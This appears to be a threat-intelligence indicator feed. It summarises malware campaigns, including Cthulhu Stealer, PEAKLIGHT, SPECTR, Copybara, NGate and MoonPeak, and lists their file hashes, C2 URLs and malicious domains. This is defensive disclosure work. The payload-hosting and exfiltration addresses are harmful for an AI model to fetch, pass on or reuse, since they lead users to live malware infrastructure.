This report analyzes Cthulhu Stealer, a malware-as-a-service targeting macOS users to steal credentials and cryptocurrency wallets. It explores the malware's functionality, including prompting users for passwords, dumping keychain data, and exfiltrating stolen information. The analysis compares Cthulhu Stealer to Atomic Stealer, another macOS malware with similar capabilities, and provides insights into the malware's operators and distribution methods via underground forums. |
Type |
Indicator |
FileHash-MD5 |
897384f9a792674b969388891653bb58 |
FileHash-SHA256 |
6483094f7784c424891644a85d5535688c8969666e16a194d397dc66779b0b12 |
FileHash-SHA256 |
96f80fef3323e5bc0ce067cd7a93b9739174e29f786b09357125550a033b0288 |
FileHash-SHA256 |
de33b7fb6f3d77101f81822c58540c87bd7323896913130268b9ce24f8c61e24 |
FileHash-SHA256 |
e3f1e91de8af95cd56ec95737669c3512f90cecbc6696579ae2be349e30327a7 |
FileHash-SHA256 |
f79b7cbc653696af0dbd867c0a5d47698bcfc05f63b665ad48018d2610b7e97b |
URL |
http://89.208.103.185 |
URL |
http://89.208.103.185:4000/autocheckbytes |
URL |
http://89.208.103.185:4000/notification_archive |
|
Decoding the Stealthy Memory-Only Malware |
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloader script, PEAKLIGHT, responsible for retrieving additional payloads from a content delivery network. The report examines different variations of PEAKLIGHT and the malware it delivers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The analysis highlights the obfuscation techniques employed by the threat actors, such as system binary proxy execution and CDN abuse. |
Type |
Indicator |
FileHash-MD5 |
c047ae13fc1e25bc494b17ca10aa179e |
FileHash-SHA1 |
e293c7815c0eb8fbc44d60a3e9b27bd91b44b522 |
FileHash-SHA256 |
6c30c8a2e827f48fcfc934dd34fb2cb10acb8747fd11faae085d8ad352c01fbf |
FileHash-MD5 |
059d94e8944eca4056e92d60f7044f14 |
FileHash-MD5 |
236c709bbcb92aa30b7e67705ef7f55a |
FileHash-MD5 |
307f40ebc6d8a207455c96d34759f1f3 |
FileHash-MD5 |
43939986a671821203bf9b6ba52a51b4 |
FileHash-MD5 |
47eee41b822d953c47434377006e01fe |
FileHash-MD5 |
58c4ba9385139785e9700898cb097538 |
FileHash-MD5 |
62f20122a70c0f86a98ff14e84bcc999 |
FileHash-MD5 |
91423dd4f34f759aaf82aa73fa202120 |
FileHash-MD5 |
95361f5f264e58d6ca4538e7b436ab67 |
FileHash-MD5 |
a6c4d2072961e9a8c98712c46be588f8 |
FileHash-MD5 |
b15bac961f62448c872e1dc6d3931016 |
FileHash-MD5 |
b6b8164feca728db02e6b636162a2960 |
FileHash-MD5 |
b716a1d24c05c6adee11ca7388b728d3 |
FileHash-MD5 |
bb9641e3035ae8c0ab6117ecc82b65a1 |
FileHash-MD5 |
c56b5f0201a3b3de53e561fe76912bfd |
FileHash-MD5 |
d6ea5dcdb2f88a65399f87809f43f83c |
FileHash-MD5 |
d7aff07e7cd20a5419f2411f6330f530 |
FileHash-MD5 |
d8e21ac76b228ec144217d1e85df2693 |
FileHash-MD5 |
dfdc331e575dae6660d6ed3c03d214bd |
FileHash-MD5 |
e7c43dc3ec4360374043b872f934ec9e |
FileHash-MD5 |
f98e0d9599d40ed032ff16de242987ca |
FileHash-SHA1 |
1dcb61babb08fe5db711e379cb67335357a5db82 |
FileHash-SHA1 |
2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
FileHash-SHA1 |
46a491abbbb434b6a1a2a1b1a793d24acd1d6c4b |
FileHash-SHA256 |
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
FileHash-SHA256 |
9fa7cacb5730faacc2b17d735c45ee1370130d863c3366d08ec013afe648bfa6 |
FileHash-SHA256 |
bf1a0c67b433f52ebd304553f022baa34bfbca258c932d2b4b8b956b1467bfa5 |
URL |
http://62.133.61.56/Downloads |
URL |
http://62.133.61.56/Downloads/Full |
URL |
http://62.133.61.56/Downloads/Full%20Video%20HD%20 |
URL |
http://gceight8vt.top/upload.php |
URL |
https://brewdogebar.com/code.vue |
URL |
https://forikabrof.click/flkhfaiouwrqkhfasdrhfsa.png |
domain |
brewdogebar.com |
domain |
considerrycurrentyws.shop |
domain |
deprivedrinkyfaiir.shop |
domain |
detailbaconroollyws.shop |
domain |
forikabrof.click |
domain |
gceight8vt.top |
domain |
horsedwollfedrwos.shop |
domain |
messtimetabledkolvk.shop |
domain |
patternapplauderw.shop |
domain |
relaxtionflouwerwi.shop |
domain |
tropicalironexpressiw.shop |
domain |
understanndtytonyguw.shop |
|
Report on Ukraine government attack campaign |
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfuscated PowerShell script designed to install the SPECTR malware and the new FIRMACHAGENT program. These components enabled data theft, document exfiltration, screenshot capturing, and browser data theft, while scheduled tasks managed the malware components. Reducing the attack surface by limiting user privileges and implementing application whitelisting policies can mitigate this threat. |
Type |
Indicator |
FileHash-MD5 |
2972616c870bffdb1978b487df290dfe |
FileHash-MD5 |
4dd66548c1022822cf8247ca615ceea9 |
FileHash-MD5 |
522c2988dd63e162503c41dc87d631f6 |
FileHash-MD5 |
580a05ffdb0f3d5d703ccb2bcf04f9b7 |
FileHash-MD5 |
65e5f73193f87e233244479859a00fd1 |
FileHash-MD5 |
7d439f13a55f082fd674875f898197d7 |
FileHash-MD5 |
7dc1016e78f8c243b3b0fa59eb648567 |
FileHash-MD5 |
a3c977578212134897a864795e769a8d |
FileHash-MD5 |
a9261e37a5a2fadbf58c71f15f48ad18 |
FileHash-MD5 |
a973224da0ebfca023ab3e55913447a9 |
FileHash-MD5 |
b58e45c4707b88dc1e89fd58359bfd5b |
FileHash-MD5 |
b99d5bfcdf9535f094204137ab064c96 |
FileHash-MD5 |
d657fa0c86523d0376cc0c988c6c9e11 |
FileHash-MD5 |
e2c25142f08cd8f9c6f87266c7ffb829 |
FileHash-MD5 |
e5b69e06a2452914250e34be1de4ae6a |
FileHash-MD5 |
ef123bc71a5f0e323b6a5c809d17d048 |
FileHash-MD5 |
f6b21151b924a31b936d3b299c0129b7 |
FileHash-MD5 |
f8efa529dff81b0e02a786fc766ffca3 |
FileHash-SHA256 |
087158ad28080ef438047b88896dfa1962d1cd6fed8fce06e35c25f91ad5f1ff |
FileHash-SHA256 |
180f9a2d3de0b5f031408797286837bb4b10b2a6d8797cf985347f5d80f9e4a0 |
FileHash-SHA256 |
21c33c8365218b7fb1bbb0d45af77926877fb33384ef58fbbb6db04b9df55eb6 |
FileHash-SHA256 |
3e6c13f9e4cee9b8d55d7a83fd3c3d5d6d09b6c477c4f84fd79db6cc8de7ea42 |
FileHash-SHA256 |
4d8918cfcc97ca63666937e5d53373793f3695a2b1177e27a78aa34303c2ee80 |
FileHash-SHA256 |
68fe595237eec1261184a5f3a00cc0f678a33751615796942001997575887557 |
FileHash-SHA256 |
6a18392e3e062ce0fcd4688c0b09e482855cf709eb178437d8fe2cdc9cfdf51f |
FileHash-SHA256 |
8612668466f9c8a180e0e9a3c92c85a03788f2f0bb3c6bf70f52c356e02702db |
FileHash-SHA256 |
8987952745a8d46a8f2e6d1666cc9c542b6a9a96787ef467c76b779a8b6c1a66 |
FileHash-SHA256 |
8d4808ed167ac91724e8ab4da24bcc3bd2159a4972c212a1cd4062f02a3731d0 |
FileHash-SHA256 |
ad30e29ba883c3f528d2782dbc3d1b5258815b619c6dfc3639fee416cf27fb1f |
FileHash-SHA256 |
b95ef984bfb22c55881931b134deaf1b848fbfda4180fc393b9f532f51089cbb |
FileHash-SHA256 |
d16239cfbee14a8621637934aebe2d5253fea04940d2eb082bd8dcdc41111d4b |
FileHash-SHA256 |
d44ff1bd3c7ff81228548c82ea68c33bdea780772ce55dc4be2d4156985a326a |
FileHash-SHA256 |
ea1945d887cbe8a56234cec6da2c46ed7a28ae6a69fd49181b3d13a71943ffd9 |
FileHash-SHA256 |
eef9f73dc7e0cdd4b1780ecd20845496a91e0f1c096264208d991935c5e97308 |
FileHash-SHA256 |
f00c85d9db7a2a2bf248771b8d81d978fa6d2153e6a3095d9c5896b604e9d00d |
FileHash-SHA256 |
f94b8d2391b53dfb96035a2ba628224c3bfedf77021c896b64a0d7c8f2121e17 |
URL |
http://171.22.120.50/data/Browser.txt |
URL |
http://171.22.120.50/data/Files.txt |
URL |
http://171.22.120.50/data/IDCLIPNET_x86.txt |
URL |
http://171.22.120.50/data/Screen.txt |
URL |
http://171.22.120.50/data/Social.txt |
URL |
http://171.22.120.50/data/USB.txt |
URL |
http://171.22.120.50/data/chrome_updater.txt |
URL |
http://prozorro.online/data/spysok_kursk.zip |
URL |
http://prozorro.online/info/docx/recon |
URL |
http://ukraero.space/jobs/download |
URL |
http://ukraero.space/jobs/upload |
domain |
prozorro.online |
domain |
ukraero.space |
|
Technical Analysis of Copybara |
This report presents a comprehensive technical analysis of a newly discovered variant of the Copybara Android malware. The malware, which emerged in November 2021, is primarily spread through voice phishing attacks. It utilizes the MQTT protocol for command-and-control communication and abuses Android's Accessibility Service to exert control over infected devices. The malware downloads phishing pages mimicking cryptocurrency exchanges and financial institutions to steal user credentials. The analysis covers 59 supported commands with detailed functionality descriptions, providing valuable insights into the malware's capabilities. |
Type |
Indicator |
FileHash-MD5 |
03ee48f6e7f0840ef94336af579ccdf4 |
FileHash-MD5 |
112bc421690788f883e62742cd7e142a |
FileHash-MD5 |
1150d0bf3a077be4f33eb487129d389a |
FileHash-MD5 |
14e70653b82895367d33ec8570c9038e |
FileHash-MD5 |
1ec0f8696578e0e427140fd256ec4e4f |
FileHash-MD5 |
215ca929eea5866ef9e879fe37f9ce17 |
FileHash-MD5 |
215eb7fd4c261e17a696e8ba6a4061ed |
FileHash-MD5 |
22483da70e998a316e9ac5b905b0fc9e |
FileHash-MD5 |
271f79eb4ca49040fef16725777ac577 |
FileHash-MD5 |
28f2aaa7855c1a2d5e5ec6444fa833a9 |
FileHash-MD5 |
304f779e21b4f70f4ce70ce4dd19dbe8 |
FileHash-MD5 |
3251cb4712b6c7aeb3f48c3ef767c735 |
FileHash-MD5 |
3c90ca08d834d4650409a4282bbe6d42 |
FileHash-MD5 |
459b8182aaaf3ef14e9fd4754b40610a |
FileHash-MD5 |
4637f70bb727b40f3d7e8be88da1f244 |
FileHash-MD5 |
4e51973921f1bf1c26b7d045d9716ae8 |
FileHash-MD5 |
4f007c674721466ff8af2d6b8b0e6040 |
FileHash-MD5 |
5391b95013437f299b6d096ad2fc96fb |
FileHash-MD5 |
53be8d45faa3f943faf51fc95b76df5b |
FileHash-MD5 |
5f0ce16fd6fe97db0aad3ccf70c5da82 |
FileHash-MD5 |
65040bd2de9805826d66d1ff5996ed52 |
FileHash-MD5 |
67664abfaec4d2d7e387c988d0c003ca |
FileHash-MD5 |
68c7a9796ef7c50c56513618b6ab4f9c |
FileHash-MD5 |
6d8af62f295ac4cfc23d20af97339440 |
FileHash-MD5 |
6eb2123c58bb283790a43b5fdaef1c25 |
FileHash-MD5 |
71896aa37e39028680b628cb05080028 |
FileHash-MD5 |
7a4e9e5692e0031e130dbc41f3d74b82 |
FileHash-MD5 |
7c203ad3d565fce177adf272d0acd373 |
FileHash-MD5 |
933a030b3d7559a41a406f52a006c30f |
FileHash-MD5 |
93e4313edc3e70c4e50c418f1f44be80 |
FileHash-MD5 |
952af76aea0773021cfb1932245a3711 |
FileHash-MD5 |
99eee5c0856271604905dfc66fc03fca |
FileHash-MD5 |
9aa6f175b7520878ecffe98444c1b336 |
FileHash-MD5 |
9f2e8bcc93740b9fc8122ad7abcc43c9 |
FileHash-MD5 |
a57e009fdee84765642e655e4802c288 |
FileHash-MD5 |
a9036e8521431d6f6d50ea31ccdee96d |
FileHash-MD5 |
a95315ca7af6d857379adb2c87f27c72 |
FileHash-MD5 |
af869a4ab0bf10e528b0190a721cd7fc |
FileHash-MD5 |
b0cc816ac58ef4e309aab3362dc6b8ab |
FileHash-MD5 |
b1109bd86eeed5b4badd2eaf099c65f9 |
FileHash-MD5 |
b3f067b4dfea589351b3f5f25dfb1b3c |
FileHash-MD5 |
b4b85702d206534735f85b783123dc1a |
FileHash-MD5 |
ba1c2891d626401c5e1eb5b677ef2804 |
FileHash-MD5 |
bb2d3c26762eaa3b9c0bc1915dfe8ca0 |
FileHash-MD5 |
cb8e75a3d907ad22eec1bacafce09265 |
FileHash-MD5 |
d5b765f43eb431f3a4b8e49905282843 |
FileHash-MD5 |
eaff7697d0bc139cd3f2c2527522982e |
FileHash-MD5 |
ed9c745a566fc35e7f24e6b70bbb57cf |
FileHash-MD5 |
f1ae4692dfd5977fdec487bf55119008 |
FileHash-SHA1 |
00a890a7a862864dfba02fc14c4a154c7ebb3534 |
FileHash-SHA1 |
01b4ccd93e342d41c5ab357bf09472e84e256762 |
FileHash-SHA1 |
02c4b864b6263f9124ff4c38ad81f77d85785407 |
FileHash-SHA1 |
0694c99741258c9609771c544a647f6641caa138 |
FileHash-SHA1 |
0a97cbb917e9e42b369d702724549ccc3a906e81 |
FileHash-SHA1 |
0f924de937516916f5c6f64ff0548190338e264b |
FileHash-SHA1 |
0fc8c1e2c08fd3dc83ceb72a4848c9aab66b7d57 |
FileHash-SHA1 |
11b00c50bdafd9d9a2effcd4e51655689afb0b84 |
FileHash-SHA1 |
19827b4c35bbc0e91d5c7b16b873e783139dcc11 |
FileHash-SHA1 |
22e40aac894a8218aae2f1b5eeb79473922eb97c |
FileHash-SHA1 |
2acbf2241c6f78b0d98623d40fa40e90cb952051 |
FileHash-SHA1 |
2c4df83e48e7bc6d6141d5c5834d7fcc48d02272 |
FileHash-SHA1 |
2e83754306f1bc776d0ca3aa3d67de16c087a799 |
FileHash-SHA1 |
2fbd5167aa0194bbb8bcc4d039abd847c30b12ce |
FileHash-SHA1 |
3c83cf0aec9a83bbb2cf9eba15f371be7fcdb6f6 |
FileHash-SHA1 |
4982a6e134a829373ac75c988b8f1717bb0782ef |
FileHash-SHA1 |
4a541fdc55f63fbd24474587920d161af0adcf8f |
FileHash-SHA1 |
4baaf217d259f90e9edf23e345551e6e875869a5 |
FileHash-SHA1 |
5469926232601e434617b7f0dce3fc22c9069a3b |
FileHash-SHA1 |
57b3a92819027caf9872d1e4ea854686510dc89b |
FileHash-SHA1 |
59e34e322dec70427df161636527eddaff09672c |
FileHash-SHA1 |
5b002f7ce5d7b12fb72c60a8be998aeada8310aa |
FileHash-SHA1 |
5e524201f30399d334f6149cd61092e08901abda |
FileHash-SHA1 |
646ad65834a3190d930ba59fd9adbd3bf7934c49 |
FileHash-SHA1 |
67deca3fe3025a3b384240aa76c8c986818b21ea |
FileHash-SHA1 |
716043927b6935f35beaffe9c0395a4141459f24 |
FileHash-SHA1 |
8698e712dc3ae9b2554f421d14e2d77323f0896a |
FileHash-SHA1 |
87f852299fcbc26dcbd2b13863a8a6b95a7eb887 |
FileHash-SHA1 |
8b0d446fdaee497e107d35a2d04872dd9e6a9370 |
FileHash-SHA1 |
8cf89e59bb4d4723f86bee09a087cab95466a473 |
FileHash-SHA1 |
91a0c054c037eb178a26b240a0d4d235a81b638c |
FileHash-SHA1 |
9217ec6747a7d023fc46c0cf5c6d3918941fb65f |
FileHash-SHA1 |
9925de249b29f1aeae1b99c88d5d25c878a3805b |
FileHash-SHA1 |
9d63128e79362c0efc2bd3c35f918e4e1dfb16d3 |
FileHash-SHA1 |
a1967b428d4473e191ac391f5c2d7c54a906e97b |
FileHash-SHA1 |
a5cd2dd1be880362a2b376e80981aa5caf69aa7b |
FileHash-SHA1 |
bc03f1ba99cfb61c5b09b8925fc2f7a0e9e12470 |
FileHash-SHA1 |
be2c6aeb07af97d32f2b9ae6e990e4300ca09dcb |
FileHash-SHA1 |
c5cd9ac3cb56b8693e53ce1afb09206894e407ff |
FileHash-SHA1 |
cbc9b927ba0569b4cd3d6cf346ccc0e535772a43 |
FileHash-SHA1 |
d09f74e066c00e30aed773f9355c7909c7a471b8 |
FileHash-SHA1 |
d4c95dd98a02e7b96c665d53de27d6c4267300e5 |
FileHash-SHA1 |
db1b313a2f6d11a651fc941c46b2d02a9b2856ff |
FileHash-SHA1 |
db597d71ee15b475a396994ba28f4321564b5c3c |
FileHash-SHA1 |
dee29fb458a62b82e63a8f1cc570b4b2136faa1c |
FileHash-SHA1 |
e646d6084d89e2d9e4c62afd38df3860575388e1 |
FileHash-SHA1 |
e8575ac8924c6600e3ad00fc93f557ae63d542a8 |
FileHash-SHA1 |
f4b1595a066993ff06c849bc0faedde263c8b4cf |
FileHash-SHA1 |
feaab9df3ccd453b31bf84e2f2d7de6cf694a84e |
FileHash-SHA256 |
01b0e9cb7e864e753261b94e3e652254968d8188562a5abfc240d19fa783bc5f |
FileHash-SHA256 |
0280536885bb406bc8cd90631bb48ddd809dcf16ecfb5acdc2e75c40171a63af |
FileHash-SHA256 |
11470b5107f563c19ab92929a0e0ee5cf1b0c95fdd146f69ff9f9d4123f908cb |
FileHash-SHA256 |
136efade44da726858480a9b56aab5a9509e7c04b71fec08e9b779c069632d8c |
FileHash-SHA256 |
13b904ed2391fed303979b8b8fe0ac72a356cab091057600237fc8ac784db82a |
FileHash-SHA256 |
1487cfbb6d702b8b2cfa88a6d586c092cdfbb472274ff54f894df35edd2f9d3e |
FileHash-SHA256 |
19e74d9f5649e9180b2b32b95c654e7fe448d989a44c15c9b3c245fa3150df5a |
FileHash-SHA256 |
1a3e682c924edc1dc0a525f7f1c3e2534cb2945dfaf5bad52089592d216c6c7b |
FileHash-SHA256 |
22046aaef8a6439d1f5f2980b4d6282e7b69e98c95a0f52010d8953f0cb5e736 |
FileHash-SHA256 |
22988cbb286f387036ced6fca6bb72b9f5e326706ad99065bc04bb8cb5dc4a12 |
FileHash-SHA256 |
230f3d74004fee235055e786aba413abff2ed5cf4faa1987a070493be28c75d1 |
FileHash-SHA256 |
24a58d1168d02009c97095e75387765e63b320a0dde1f8a9a7c8e3689a3f6dfb |
FileHash-SHA256 |
28323f93a6657363a0637341358303485d2cf240995457fc8393fb6b74f10d30 |
FileHash-SHA256 |
29e642ef6bd41f343f66210e924724bb343432affd1ed25bf386d638ae79ee87 |
FileHash-SHA256 |
2a1118c91d97a34e06344191eff546c062f81ccf58a7fa7bf1ec206a42d36c2b |
FileHash-SHA256 |
2a5d05a6bfb3a73a91d88c15384c9b384d9309e8db0ed4e348d1a85d0f6729db |
FileHash-SHA256 |
2d5e80f752608faa23f05e6558a695fcac261d78b9979d6746dc11dc995665e3 |
FileHash-SHA256 |
376ff4dbea2e3570a5cb98a8b335c0503d050fecd7bb4f65d252b1b596d14fc7 |
FileHash-SHA256 |
40df5d874ed86aa65454d3d7becc334b7ca2dcb11754f9131135071a98752691 |
FileHash-SHA256 |
41b61acc644add0a40ec6dbda231ae41f9de478fbf8cc029bc89d95a2829a53e |
FileHash-SHA256 |
447c387fca23aea2b0b78f1cf9ee1c369078196fe3c3051bb99309268d4a9f79 |
FileHash-SHA256 |
472feeabc60fdcc87345574586a7599ead1625c94bf75f373e9086b4a6cfedbe |
FileHash-SHA256 |
4b43f7145eebe4c07d208911b9d74c7c996a5037a04d52e4c38a80c2456d1187 |
FileHash-SHA256 |
4daf21a708afc06c0da4ee6e192a6db6405efb1e3a9eb6905cc69d501e781c8b |
FileHash-SHA256 |
5bc6f1986a6e794e8feb78c763fef5f8cbb59f3696daa468aba058fb79befbf0 |
FileHash-SHA256 |
6b15d8508e6782c25dc48618bbbe9b53c8c9a822655a8e52b7370e034fae7564 |
FileHash-SHA256 |
6bc1ac4f844a6940c9e083c32bbf3f469b1322cc5aa83e12ab1a7f35cdb51c23 |
FileHash-SHA256 |
6da8e49d8e083ec705985effa03cdb60cdd736f04ed711211b2a3842c815a708 |
FileHash-SHA256 |
731a58248c7b467bc9d9a7482d8cb010242b3a534904ddc39471fa0620752d22 |
FileHash-SHA256 |
767e4c42cefc4a29921f612f14611cf56b7d950ba91ccdd3a59adb57f25b7d18 |
FileHash-SHA256 |
790b166081fd763cc6239881a78ba5c4d757b8f98d1b5d5f7abfdede76f54c05 |
FileHash-SHA256 |
7a165645df48f6bde0fd5939a3e15d160826d944e603c34d46a7285f02f0941e |
FileHash-SHA256 |
7b3262b6c3ad52e50e2ec6faf1ffb12ca08f0d17ac4f90420f13a6053b7f9622 |
FileHash-SHA256 |
7fa3d58a0056e8492a84894a6fd3b3d0d87ff1f9656f5e54b10580b9a4a4fd6a |
FileHash-SHA256 |
7ffbc88e97be67214ad17325142ceb54823a5bdcebdbd4e4c9d0c65b3f0a1813 |
FileHash-SHA256 |
85901707c7d058269820671e10af027eeadd39ee15f079cff340eed0f0ac9c2e |
FileHash-SHA256 |
868ce8fa932c46b6de18455dfc0935a75029cc10c7b484bc358cdfabf0b0c533 |
FileHash-SHA256 |
878bb68727daf025c0c9619d1d12337c289489f1190410ca4025c47f39357aa5 |
FileHash-SHA256 |
8a2f6ff8aa1a6b416cb0aaa1530a8178c53760a69ce5c14d1d16ee880c335a4f |
FileHash-SHA256 |
8b05684a73f44ed82c0faf424b2d41a0c7b00c2fef4d7dc232c5433739a59f6c |
FileHash-SHA256 |
8bbb6cd5277177beb86b037ef77d6fcbae4a51a19668063d4d1b40ce2453dad3 |
FileHash-SHA256 |
91fda73902e1a2a76b999df11caa4532c9c440d6f3da63dc03e0a78109d7583a |
FileHash-SHA256 |
9762eba15b893609b9461125c5adbcaf3bac7fea9536ffca72566abfa1bed084 |
FileHash-SHA256 |
9830b91dfcf987a2556afd85893f8569c6ba03e3ebb194ecb6b32dafbc22e1e1 |
FileHash-SHA256 |
989cf5faf307304f86db03180978ba4bd93c909bb458db83fcebe4fb48d7a002 |
FileHash-SHA256 |
9b204f839aed79d4c27f8d28198ef596dec9848a27a51f0672743a91e618677c |
FileHash-SHA256 |
9c136701362e2d661805257c02e23c9aa01b9081e1a559571f947390522fc51b |
FileHash-SHA256 |
9f693923e5641c046bdcadf10b4e2b553d078b98afc2e30f2d72660b1e0161ed |
FileHash-SHA256 |
a1a1fbdb6070ff388642974b1616d1955c2a89fbb8702caa02fa6927adbdad6c |
FileHash-SHA256 |
a46537ccf4a188091f973a47b7186ee805539a0e5d94c62867cec08cec1c33e6 |
FileHash-SHA256 |
a8cc088426c6406f03ccedbb854e8dc83543d38c98a405db15074e9531731ade |
FileHash-SHA256 |
ab85b62cad1a4009bf99c621b4950ee23c413b5c424952f225497bca7a318a99 |
FileHash-SHA256 |
ad1182d8bf3b1976e09f45b91085167559bc24e8f5e3f7315f96f344532cbcf8 |
FileHash-SHA256 |
afa3c43141a5b6f2473d49cdfa0bce1bf0af235a40f3ec092299287291137841 |
FileHash-SHA256 |
b009ad0ed336f1e4bff3f452e238b3ea83d3bc7773f52d16d057298c116a95ea |
FileHash-SHA256 |
b1b6a2d91e6fcc07322edce92aa75c13763b6844b2a1a549eeaf0f536bdc6183 |
FileHash-SHA256 |
b217e4f8143a6fbbad2e0667ce8242fc207274a78ce464af9b122df8ba12690b |
FileHash-SHA256 |
b4379324c7dc1fc623bcd9d2e8099dc3588ac23f87f33151d1c1005a1f33e713 |
FileHash-SHA256 |
b5c206d8f980c8fa12a29886fad49f6a1469264055740cdf763efa7f726cd8d7 |
FileHash-SHA256 |
b99fc0a9eea993d6b5a04b0a0b05fe103f164fb85281fcddb04ac686daee065f |
FileHash-SHA256 |
bcae6ea26fe1dd1fa5652e05c1b888186307ad277ce238a255908061b837a484 |
FileHash-SHA256 |
bff6fb5cbb1c0f8d05e2c6acefcf499a9c22f10d7db8aeda994638bf75018fbf |
FileHash-SHA256 |
c32eb3b850a20e4715a6db40635de9fc6cefad840ce7e64e9c68c2b3e378ee7e |
FileHash-SHA256 |
c8c73080a2eb18ad1434ac408e916f3f819637550dfe07f20ad79e66ec1b2cf9 |
FileHash-SHA256 |
cad56908abd1508451a5af4a5304de092f0342ec6a24bbbeb9b3988683483c84 |
FileHash-SHA256 |
d23ef9fe27b116d982f8ebafb99587ffc9cc6c9b932f1b2d5efab2dad156e65e |
FileHash-SHA256 |
d852f48e1c8a37d11f9dfb90f339316a5a3fa012bf152db43de1e81b45a69ba7 |
FileHash-SHA256 |
d887be78f443fabeb348ac2f85e1d42ed4d1c2cfc87d9e314c4b812c0b1fcfd8 |
FileHash-SHA256 |
de242d9428a378a1b0dacb2e8d481fdfb062a47450f815c13e105975d5a41663 |
FileHash-SHA256 |
e097bb08da761ae5780e6c600c79738e36285a59589098dde53c88611c1ac66a |
FileHash-SHA256 |
e328dde9fa6db3da195e813696973657cc4fe636601cb0061a75c5086b04aa95 |
FileHash-SHA256 |
e3875e3b20be42f38f457cf0b0d85683535472b47535635ec42da52b73b27e6e |
FileHash-SHA256 |
e57565bd3f398508321470f857dfb07c195ed9b7b494ba00dc7c407ac8b8f3e1 |
FileHash-SHA256 |
e82b0023abcc4bdb549f319389620c4cbd8ffabe8648168db31db62fd84a6904 |
FileHash-SHA256 |
eb1f89b2edaeda18023a6ea5cd7a4b2997e4839e1f3d57e54c5b7a1b64407874 |
FileHash-SHA256 |
eb779ec4ed2c85e114a18db89b8ef9c7a19adc907748d1f18076e167f79bf04b |
FileHash-SHA256 |
f6975b1a9ab8935d45d6c2d94540b67b2374827734593c126785924afffb6634 |
FileHash-SHA256 |
f703f31f7b9ef95f820a724ebcee36377e2f4a42c92756b819bea6f34ec96cac |
FileHash-SHA256 |
f91fd4f9b6594446144ba865356fde07669ea0b46a62ddd926bb8cac0aa04dc9 |
domain |
clienti-dati.com |
domain |
clienti-verifica.com |
domain |
datos-cliente.com |
domain |
descarga-app-sign.com |
domain |
descargar-e-instalar.com |
domain |
enlace-cliente.com |
domain |
entrar-y-confirmar.com |
domain |
generali-verifica.com |
domain |
installa-app.com |
domain |
la-mia-app.com |
domain |
la-nuova-app.cc |
domain |
scarica-app-token.com |
domain |
scarica-app.icu |
domain |
scarica-app.site |
|
NGate Android malware relays NFC traffic to steal cash |
ESET researchers uncovered a crimeware campaign targeting bank customers in Czechia. The NGate Android malware can relay NFC data from victims' payment cards to attackers' devices, enabling unauthorized ATM withdrawals. It's the first time this capability has been observed in the wild. The campaign evolved from using phishing PWAs and WebAPKs to deploying NGate, which tricks victims into providing banking details and NFC card data. |
Type |
Indicator |
FileHash-SHA1 |
0c799950ec157bb775637fb3a033a502f211e62e |
domain |
raiffeisen-cz.eu |
hostname |
app.mobil-csob-cz.eu |
hostname |
csob-93ef49e7a.tbc-app.life |
hostname |
geo-4bfa49b2.tbc-app.life |
hostname |
george.tbc-app.life |
hostname |
nfc.cryptomaker.info |
hostname |
rb-62d3a.tbc-app.life |
hostname |
rb.2f1c0b7d.tbc-app.life |
hostname |
rb.system.com |
|
Be careful what you wish for – Phishing in PWA applications |
ESET analysts dissected a novel phishing method tailored to Android and iOS users, combining standard phishing delivery techniques with a novel approach of targeting mobile users via Progressive Web Applications (PWAs) and WebAPKs. Insidiously, installing these phishing PWAs and WebAPKs does not trigger warnings about installing third-party applications. Most of the observed applications targeted clients of Czech banks, but some also targeted banks in Hungary and Georgia. Two different threat actors were determined to be operating the campaigns based on their distinct command-and-control infrastructures. |
Type |
Indicator |
domain |
blackrockapp.eu |
domain |
cyrptomaker.info |
domain |
hide-me.online |
domain |
play-protect.pro |
hostname |
csas.georgecz.online |
FileHash-SHA1 |
d3d5ae6b8ae9c7c1f8690452760745e18640150d |
FileHash-SHA1 |
66f97405a1538a74cee4209e59a1e22192bc6c08 |
|
MoonPeak malware unveils new details on attacker infrastructure |
Cisco Talos has uncovered a campaign employing a new malware family called 'MoonPeak,' a remote access trojan actively developed by a North Korean advanced persistent threat group tracked as 'UAT-5394.' The analysis reveals the evolution of MoonPeak from an open-source malware called XenoRAT, with the threat actors introducing modifications to evade detection and analysis. Talos mapped the infrastructure used in this campaign, including command and control servers, payload hosting sites, and virtual machines for testing implants, unveiling the tactics, techniques, and procedures employed by UAT-5394. |
Type |
Indicator |
FileHash-MD5 |
535f59bc95fe3efc22abf5036c60ade0 |
FileHash-MD5 |
571c577595223518fd5a3ee8b36928d7 |
FileHash-MD5 |
60e8ed6c37e1fe9742a49916e07002e5 |
FileHash-MD5 |
9924b24434e2d92d0fc3b683006cbad1 |
FileHash-MD5 |
a470afe2f7176694553158bcd3decb53 |
FileHash-MD5 |
ca005ebe9454f30c2cedd73080677f56 |
FileHash-MD5 |
d3dd07f2454b9c81d9d16e65d6f24000 |
FileHash-MD5 |
e8ab7a58f35cae486d61c94910faa4fa |
FileHash-MD5 |
ee1dca47840fbab6d8956ef97f352496 |
FileHash-MD5 |
fcbc07e56f496e836c29833b89a23fce |
FileHash-SHA1 |
0eb6b3fa6f054d46158133c89df5eb5b30a37dfb |
FileHash-SHA1 |
1f2fa02f4e71b27700888cee750d4681bd858b2a |
FileHash-SHA1 |
2092423079ac375a59cd3cb320ca6d21d6732ed6 |
FileHash-SHA1 |
2ab49cbc1f4518e3368712a960c49a3e24975351 |
FileHash-SHA1 |
3495faeddcc98fc770bb9b275314234c8aae8502 |
FileHash-SHA1 |
63e9a16b0f4e7d8b290b95aec4cf3773f6e001df |
FileHash-SHA1 |
7c837e382597a42244002062a6adf1f71417fbbe |
FileHash-SHA1 |
8c1249d410a42319aa24cb9bdc0ab2cf4bca4342 |
FileHash-SHA1 |
a896a8140562c9e93828320d2a198a6dc24a453e |
FileHash-SHA1 |
af1c0acd817a53e9ec1c8cd081cd3b112205e2ec |
FileHash-SHA256 |
0b8897103135d92b89a83093f00d1da845a1eae63da7b57f638bab48a779808e |
FileHash-SHA256 |
0ed643a30a82daacecfec946031143b962f693104bcb7087ec6bda09ade0f3cb |
FileHash-SHA256 |
